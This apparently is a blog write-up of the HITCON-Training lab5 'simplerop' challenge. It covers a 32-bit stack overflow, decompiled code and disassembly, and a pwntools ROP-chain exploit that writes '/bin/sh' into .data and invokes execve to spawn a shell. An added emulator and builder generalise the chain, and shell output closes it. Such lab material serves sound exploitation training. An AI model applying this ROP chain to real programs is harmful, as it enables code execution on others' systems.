[HITCON-Training] lab5

2019. 11. 11. 11:43 | Wargame & CTF/HITCON-Training

HITCON-Training lab5

Summary

  • 32bit

  • syscall

Analysis

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
 int v4; // [esp+1Ch] [ebp-14h]

 puts("ROP is easy is'nt it ?");
 printf("Your input :");
 fflush(stdout);
 return read(0, &v4, 100);
}

main assembler dump

Dump of assembler code for function main:
  0x08048e24 <+0>: push   ebp
  0x08048e25 <+1>: mov   ebp,esp
  0x08048e27 <+3>: and   esp,0xfffffff0
  0x08048e2a <+6>: sub   esp,0x30
  0x08048e2d <+9>: mov   DWORD PTR [esp],0x80be068
  0x08048e34 <+16>: call   0x804f640 <puts>
  0x08048e39 <+21>: mov   DWORD PTR [esp],0x80be07f
  0x08048e40 <+28>: call   0x804f0e0 <printf>
  0x08048e45 <+33>: mov   eax,ds:0x80ea4c0
  0x08048e4a <+38>: mov   DWORD PTR [esp],eax
  0x08048e4d <+41>: call   0x804f400 <fflush>
  0x08048e52 <+46>: mov   DWORD PTR [esp+0x8],0x64
  0x08048e5a <+54>: lea   eax,[esp+0x1c]
  0x08048e5e <+58>: mov   DWORD PTR [esp+0x4],eax
  0x08048e62 <+62>: mov   DWORD PTR [esp],0x0
  0x08048e69 <+69>: call   0x806cd50 <read>
  0x08048e6e <+74>: leave  
  0x08048e6f <+75>: ret    
End of assembler dump.

The buffer overflow is in v4. Input is read into v4, but it does not start at ebp-0x14 as the decompiler comment suggests; it starts at ebp-0x1c.

Exploit

from pwn import *

context(arch="i386", os="linux")

e = ELF("./simplerop")
p = process("./simplerop")

# ROP gadgets found in the binary (no PIE, so the addresses are fixed)
popedxecxebx = 0x0806e850  # pop edx ; pop ecx ; pop ebx ; ret
popedx = 0x0806e82a        # pop edx ; ret
popeax = 0x080bae06        # pop eax ; ret
movret = 0x0809a15d        # mov dword ptr [edx], eax ; ret
int0x80 = 0x080493e1       # int 0x80

p.recvuntil(b":")

# buffer starts at ebp-0x1c: 0x1c bytes to the saved ebp, 4 more to reach the return address
payload = b""
payload += b"A" * (0x1c + 0x4)

# write "/bin" to __data_start
payload += p32(popedx)
payload += p32(e.symbols["__data_start"])
payload += p32(popeax)
payload += b"/bin"
payload += p32(movret)

# write "/sh\x00" to __data_start + 4
payload += p32(popedx)
payload += p32(e.symbols["__data_start"] + 4)
payload += p32(popeax)
payload += b"/sh\x00"
payload += p32(movret)

# execve(__data_start, NULL, NULL): ebx = path, ecx = argv, edx = envp, eax = 11
payload += p32(popedxecxebx)
payload += p32(0)                          # edx = envp
payload += p32(0)                          # ecx = argv
payload += p32(e.symbols["__data_start"])  # ebx = "/bin/sh"
payload += p32(popeax)
payload += p32(11)                         # SYS_execve
payload += p32(int0x80)

p.sendline(payload)
p.interactive()

Writing "/bin/sh\x00" into __data_start one dword at a time and then invoking the execve syscall gives a shell.
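To see what the chain does without running the binary, here is an added example (not from the write-up) that builds the same gadget chain for an arbitrary command string, one dword per pop edx / pop eax / mov [edx], eax triple, and then steps through it with a tiny gadget emulator that reports the registers and .data contents at the int 0x80. The gadget addresses are the write-up's; the __data_start address is a constructed placeholder, since the ELF's value is not on the page.

```python
import struct

# Gadget addresses as listed in the write-up (simplerop, no PIE).
POP_EDX_ECX_EBX = 0x0806e850  # pop edx ; pop ecx ; pop ebx ; ret
POP_EDX = 0x0806e82a          # pop edx ; ret
POP_EAX = 0x080bae06          # pop eax ; ret
MOV_EDX_EAX = 0x0809a15d      # mov dword ptr [edx], eax ; ret
INT_0x80 = 0x080493e1         # int 0x80
# Constructed placeholder: the real value comes from ELF(...).symbols["__data_start"].
DATA_START = 0x080ea000
SYS_EXECVE = 11

def p32(v):
    return struct.pack("<I", v & 0xffffffff)

def build_chain(cmd=b"/bin/sh", data=DATA_START):
    """Write cmd (NUL-terminated, padded to whole dwords) into .data one dword
    at a time with pop edx / pop eax / mov [edx], eax, then execve(data, 0, 0)."""
    s = cmd + b"\x00"
    s += b"\x00" * (-len(s) % 4)
    chain = b""
    for off in range(0, len(s), 4):
        chain += p32(POP_EDX) + p32(data + off)   # edx = destination address
        chain += p32(POP_EAX) + s[off:off + 4]    # eax = next 4 bytes of the string
        chain += p32(MOV_EDX_EAX)                 # *edx = eax
    chain += p32(POP_EDX_ECX_EBX) + p32(0) + p32(0) + p32(data)  # envp, argv, path
    chain += p32(POP_EAX) + p32(SYS_EXECVE)
    chain += p32(INT_0x80)
    return chain

def emulate(chain, data=DATA_START):
    """Consume the chain the way successive 'ret's would: each gadget pops its
    operands off the fake stack. Returns (registers, .data bytes) at int 0x80."""
    words = iter(struct.unpack("<%dI" % (len(chain) // 4), chain))
    regs, mem = {}, bytearray(64)
    for gadget in words:
        if gadget == POP_EDX:
            regs["edx"] = next(words)
        elif gadget == POP_EAX:
            regs["eax"] = next(words)
        elif gadget == POP_EDX_ECX_EBX:
            regs["edx"], regs["ecx"], regs["ebx"] = next(words), next(words), next(words)
        elif gadget == MOV_EDX_EAX:
            off = regs["edx"] - data
            mem[off:off + 4] = p32(regs["eax"])
        elif gadget == INT_0x80:
            return regs, bytes(mem)
        else:
            raise ValueError("unexpected return target %#x" % gadget)
    raise ValueError("chain ran off the end without reaching int 0x80")
```

With the default command the chain is the write-up's 17-word payload (68 bytes after the padding); a longer string such as b"/bin/bash" simply produces a third write triple.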

https://cg10036.tistory.com/102 contains a solution that uses the same approach.

cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab5$ p ex.py 
[*] '/home/cg10036/HITCON-Training/LAB/lab5/simplerop'
  Arch:     i386-32-little
  RELRO:   Partial RELRO
  Stack:   No canary found
  NX:       NX enabled
  PIE:     No PIE (0x8048000)
[+] Starting local process './simplerop': pid 5290
[*] Switching to interactive mode
$ id
uid=1000(cg10036) gid=1000(cg10036) groups=1000(cg10036),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

